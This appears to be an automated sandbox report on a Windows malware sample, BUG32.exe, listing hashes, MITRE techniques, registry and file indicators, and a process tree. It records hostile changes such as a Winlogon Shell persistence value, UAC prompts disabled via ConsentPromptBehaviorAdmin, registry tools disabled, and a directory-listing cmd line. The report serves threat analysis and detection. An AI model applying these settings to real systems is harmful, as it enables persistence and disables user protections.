817a695e53a1d6e24f2c701751b4d18468f20698f30fada420dfba6e21a09797

Analysis

max time kernel
14s
max time network
17s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
12-01-2024 09:45

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

BUG32.exe
Size

3.0MB
MD5

149cc2ec1900cb778afb50d8026eadf5
SHA1

a7bc1bbc7bdc970757ec369ef0b51dc53989f131
SHA256

817a695e53a1d6e24f2c701751b4d18468f20698f30fada420dfba6e21a09797
SHA512

d617654478beb6325d86c108cddaff8f8d658a235d26b8e0282ed85dca826bdb62b0b67e749c7cd421dbae1d98084220e2f4d5779badb8fd7ab07ff333a35553
SSDEEP

49152:Or2U5IahDUGN97rkqOAackLjQ0rZEAh3oA6wHE+K60Kk0aCLkfAZKt0OJTcL:4H2ahFNNrg3QbQoA6wHEnFN4IJu

Score

10^/10

evasion persistence ransomware spyware stealer trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

wscript.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\bug32\\runner.vbs\""	wscript.exe

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

wscript.exewscript.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Consentpromptbehavioradmin = "0"	wscript.exe

Renames multiple (165) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Disables RegEdit via registry modification 1 IoCs

evasion

Processes:

wscript.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools = "1"	wscript.exe

Disables Task Manager via registry modification
evasion

Modifies Installed Components in the registry 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

unregmp2.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}\Version = "12,0,7601,17514"	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}\IsInstalled = "0"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}\Stubpath = "%SystemRoot%\\system32\\unregmp2.exe /ShowWMP"	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}\DontAsk = "2"	unregmp2.exe

Drops startup file 1 IoCs

Processes:

wscript.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini wscript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	wscript.exe

Modifies system executable filetype association 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

Processes:

wscript.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Bug32\\icon.ico"	wscript.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops desktop.ini file(s) 41 IoCs

Processes:

wscript.exeunregmp2.exe

description	ioc	process
File created	C:\Users\Admin\Desktop\desktop.ini	wscript.exe
File created	C:\Users\Admin\Pictures\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OZ66ZEGB\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	wscript.exe
File created	C:\Users\Admin\Downloads\desktop.ini	wscript.exe
File created	C:\Users\Admin\Links\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	wscript.exe
File created	C:\Users\Admin\Favorites\Links for United States\desktop.ini	wscript.exe
File created	C:\Users\Admin\Music\desktop.ini	wscript.exe
File created	C:\Users\Admin\Searches\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\52FOIFWV\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TQO7542V\desktop.ini	wscript.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini	unregmp2.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	wscript.exe
File created	C:\Users\Admin\Saved Games\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F3BH80GA\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\MAOUTFV0\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	wscript.exe
File created	C:\Users\Admin\Contacts\desktop.ini	wscript.exe
File created	C:\Users\Admin\Favorites\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\MO0EVTEO\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\P78YEUVS\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	wscript.exe
File created	C:\Users\Admin\Favorites\Links\desktop.ini	wscript.exe
File created	C:\Users\Admin\Documents\desktop.ini	wscript.exe
File created	C:\Users\Admin\Videos\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\2WD6IYSB\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	wscript.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

wmplayer.exe

description	ioc	process
File opened (read-only)	\??\K:	wmplayer.exe
File opened (read-only)	\??\Q:	wmplayer.exe
File opened (read-only)	\??\S:	wmplayer.exe
File opened (read-only)	\??\T:	wmplayer.exe
File opened (read-only)	\??\V:	wmplayer.exe
File opened (read-only)	\??\X:	wmplayer.exe
File opened (read-only)	\??\Z:	wmplayer.exe
File opened (read-only)	\??\I:	wmplayer.exe
File opened (read-only)	\??\B:	wmplayer.exe
File opened (read-only)	\??\E:	wmplayer.exe
File opened (read-only)	\??\N:	wmplayer.exe
File opened (read-only)	\??\O:	wmplayer.exe
File opened (read-only)	\??\W:	wmplayer.exe
File opened (read-only)	\??\Y:	wmplayer.exe
File opened (read-only)	\??\A:	wmplayer.exe
File opened (read-only)	\??\L:	wmplayer.exe
File opened (read-only)	\??\P:	wmplayer.exe
File opened (read-only)	\??\H:	wmplayer.exe
File opened (read-only)	\??\J:	wmplayer.exe
File opened (read-only)	\??\M:	wmplayer.exe
File opened (read-only)	\??\R:	wmplayer.exe
File opened (read-only)	\??\U:	wmplayer.exe
File opened (read-only)	\??\G:	wmplayer.exe

Drops file in Program Files directory 1 IoCs

Processes:

unregmp2.exe

description ioc process

File opened for modification C:\Program Files\Windows Media Player\wmplayer.exe unregmp2.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Program Files\Windows Media Player\wmplayer.exe	unregmp2.exe

Modifies Control Panel 4 IoCs

evasion

Processes:

wscript.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Control Panel\Cursors	wscript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Control Panel\Cursors\Arrow = "C:\\bug32\\bx.cur"	wscript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Control Panel\Cursors\AppStarting = "C:\\bug32\\bx.cur"	wscript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Control Panel\Cursors\Hand = "C:\\bug32\\bx.cur"	wscript.exe

Modifies registry class 64 IoCs

Processes:

unregmp2.exewscript.exewmplayer.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\video\shell\Play	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play\ = "&Play with Windows Media Player"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Play\command\DelegateExecute = "{ed1d0fdf-4414-470a-a56d-cfb68623fc58}"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play\command	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shellex\ContextMenuHandlers\PlayTo	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue\ = "&Add to Windows Media Player list"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Video\shell\Enqueue\NeverDefault	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play\command	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9800"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Video\shell\Play\NeverDefault	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Bug32\\icon.ico"	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\ = "&Play with Windows Media Player"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shell\Play\NeverDefault	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Video\shell\Enqueue\command	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-wmplayer	wmplayer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-wmplayer\CLSID = "{cd3afa96-b84f-48f0-9393-7edc34128127}"	wmplayer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaRenderer:1\ShellEx\ContextMenuHandlers\{A45AEC2B-549E-405F-AF3E-C6B03C4FDFBF}\ = "Toggle DMR Authorization Handler"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\video\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Play\command	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Video\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Play\command\DelegateExecute = "{ed1d0fdf-4414-470a-a56d-cfb68623fc58}"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Enqueue\command	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Enqueue\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9800"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Enqueue\command	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shell\Enqueue	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shell\Play\ = "&Play with Windows Media Player"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9800"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue\command	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shell\Enqueue\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9800"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Video\shell\Play\command	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\video\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Video\shell\Enqueue	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Video\shell\Play\command\DelegateExecute = "{ed1d0fdf-4414-470a-a56d-cfb68623fc58}"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shellex\ContextMenuHandlers\PlayTo	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shell\Play	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue\NeverDefault	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\video\shell\Play\NeverDefault	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shellex\ContextMenuHandlers\PlayTo	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play\command\DelegateExecute = "{ed1d0fdf-4414-470a-a56d-cfb68623fc58}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\NeverDefault	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shellex\ContextMenuHandlers\PlayTo	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9800"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shell\Enqueue\ = "&Add to Windows Media Player list"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Video\shell\Enqueue\ = "&Add to Windows Media Player list"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\video\shell\Enqueue\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9800"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\video\shell\Enqueue\NeverDefault	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Enqueue	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\command\DelegateExecute = "{ed1d0fdf-4414-470a-a56d-cfb68623fc58}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shell\Enqueue\NeverDefault	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shell\Enqueue\command	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play\ = "&Play with Windows Media Player"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue\NeverDefault	unregmp2.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

wscript.exewmplayer.exe

pid process

2692 wscript.exe
2904 wmplayer.exe
Suspicious behavior: RenamesItself 1 IoCs

Processes:

cmd.exe

pid process

2288 cmd.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

shutdown.exe

description pid process

Token: SeShutdownPrivilege 2124 shutdown.exe
Token: SeRemoteShutdownPrivilege 2124 shutdown.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

wmplayer.exe

pid process

2904 wmplayer.exe

pid	process
2692	wscript.exe
2904	wmplayer.exe

pid	process
2288	cmd.exe

description	pid	process
Token: SeShutdownPrivilege	2124	shutdown.exe
Token: SeRemoteShutdownPrivilege	2124	shutdown.exe

pid	process
2904	wmplayer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

BUG32.exewscript.exewscript.exewscript.exewmplayer.exe

description	pid	process	target process
PID 1904 wrote to memory of 2824	1904	BUG32.exe	wscript.exe
PID 1904 wrote to memory of 2824	1904	BUG32.exe	wscript.exe
PID 1904 wrote to memory of 2824	1904	BUG32.exe	wscript.exe
PID 1904 wrote to memory of 2824	1904	BUG32.exe	wscript.exe
PID 2824 wrote to memory of 2672	2824	wscript.exe	wscript.exe
PID 2824 wrote to memory of 2672	2824	wscript.exe	wscript.exe
PID 2824 wrote to memory of 2672	2824	wscript.exe	wscript.exe
PID 2672 wrote to memory of 2692	2672	wscript.exe	wscript.exe
PID 2672 wrote to memory of 2692	2672	wscript.exe	wscript.exe
PID 2672 wrote to memory of 2692	2672	wscript.exe	wscript.exe
PID 2692 wrote to memory of 2472	2692	wscript.exe	wmplayer.exe
PID 2692 wrote to memory of 2472	2692	wscript.exe	wmplayer.exe
PID 2692 wrote to memory of 2472	2692	wscript.exe	wmplayer.exe
PID 2692 wrote to memory of 2472	2692	wscript.exe	wmplayer.exe
PID 2692 wrote to memory of 3068	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 3068	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 3068	2692	wscript.exe	cmd.exe
PID 2472 wrote to memory of 2928	2472	wmplayer.exe	setup_wm.exe
PID 2472 wrote to memory of 2928	2472	wmplayer.exe	setup_wm.exe
PID 2472 wrote to memory of 2928	2472	wmplayer.exe	setup_wm.exe
PID 2472 wrote to memory of 2928	2472	wmplayer.exe	setup_wm.exe
PID 2472 wrote to memory of 2928	2472	wmplayer.exe	setup_wm.exe
PID 2472 wrote to memory of 2928	2472	wmplayer.exe	setup_wm.exe
PID 2472 wrote to memory of 2928	2472	wmplayer.exe	setup_wm.exe
PID 2692 wrote to memory of 1584	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1584	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1584	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 2492	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 2492	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 2492	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1908	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1908	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1908	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1916	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1916	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1916	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1896	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1896	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1896	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 2112	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 2112	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 2112	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 336	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 336	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 336	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 2440	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 2440	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 2440	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1372	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1372	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1372	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 2148	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 2148	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 2148	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1032	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1032	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1032	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 2576	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 2576	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 2576	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1828	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1828	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1828	2692	wscript.exe	cmd.exe
PID 2692 wrote to memory of 1732	2692	wscript.exe	cmd.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

wscript.exewscript.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Consentpromptbehavioradmin = "0"	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wscript.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

3032 attrib.exe

pid	process
3032	attrib.exe

C:\Users\Admin\AppData\Local\Temp\BUG32.exe
"C:\Users\Admin\AppData\Local\Temp\BUG32.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1904
- C:\Windows\system32\wscript.exe
  "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\FD9.tmp\FDA.vbs
  2⤵
  - UAC bypass
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:2824
- - C:\Windows\System32\wscript.exe
    "C:\Windows\System32\wscript.exe" "C:\BUG32\admin.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c dir "C:\Users\Admin\" /s/b/o:n/a:d > "C:\BUG32\list.lnk" & echo :ok:>>"C:\bug32\list.lnk"
1⤵
PID:3068

C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2472
- C:\Program Files (x86)\Windows Media Player\setup_wm.exe
  "C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
  2⤵
  PID:2928
- - C:\Windows\SysWOW64\unregmp2.exe
    C:\Windows\system32\unregmp2.exe /ShowWMP /SetShowState /CreateMediaLibrary
    3⤵
    PID:2100
  - - C:\Windows\system32\unregmp2.exe
      "C:\Windows\SysNative\unregmp2.exe" /ShowWMP /SetShowState /CreateMediaLibrary /REENTRANT
      4⤵
      Modifies Installed Components in the registry
      Drops desktop.ini file(s)
      Drops file in Program Files directory
      Modifies registry class
      PID:1872
- - C:\Windows\SysWOW64\unregmp2.exe
    "C:\Windows\system32\unregmp2.exe" /PerformIndivIfNeeded
    3⤵
    PID:2728
  - - C:\Windows\system32\unregmp2.exe
      "C:\Windows\SysNative\unregmp2.exe" /PerformIndivIfNeeded /REENTRANT
      4⤵
      PID:2668
- - C:\Program Files (x86)\Windows Media Player\wmplayer.exe
    "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Relaunch
    3⤵
    - Enumerates connected drives
    - Modifies registry class
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    PID:2904
  - - C:\Program Files (x86)\Windows Media Player\wmpshare.exe
